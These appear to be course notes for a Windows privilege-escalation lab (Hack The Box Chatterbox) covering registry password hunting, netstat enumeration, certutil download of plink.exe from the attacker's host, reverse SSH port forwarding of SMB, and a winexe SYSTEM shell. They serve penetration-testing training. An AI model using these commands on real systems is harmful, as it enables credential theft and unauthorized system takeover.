Passwords and Port Forwarding

plink.exe

Enumeration

Hunt for passwords in registry:

reg query HKLM /f password /t REG_SZ /s

Look for internal open ports:

netstat -ano

If we find a credential and internal open ports

Exploitation

On your attack machine, edit /etc/ssh/sshd_config:

/etc/ssh/sshd_config

Restart SSH service:

service ssh restart

Download plink.exe to your attack machine:

Download PuTTY: latest release (0.83)www.chiark.greenend.org.uk

plink.exe

Transfer plink.exe to the victim machine:

certutil -urlcache -f http://<local_ip>/plink.exe plink.exe

On the victim machine, do port forwarding (suppose we want to forward port 445):

plink.exe -l root -pw <your_kali_password> -R 445:127.0.0.1:445 <local_ip>

Press "Enter" a few times to get the output. Use winexe to spawn a SYSTEM shell:

winexe -U Administrator%<password> //127.0.0.1 "cmd.exe"

Lab: Hack The Box - Chatterbox

https://www.ctfwriteup.com/tcm-academy/tcm-windows-privilege-escalation-course/hack-the-box-chatterbox-mediumwww.ctfwriteup.com

Hack The Box - Chatterbox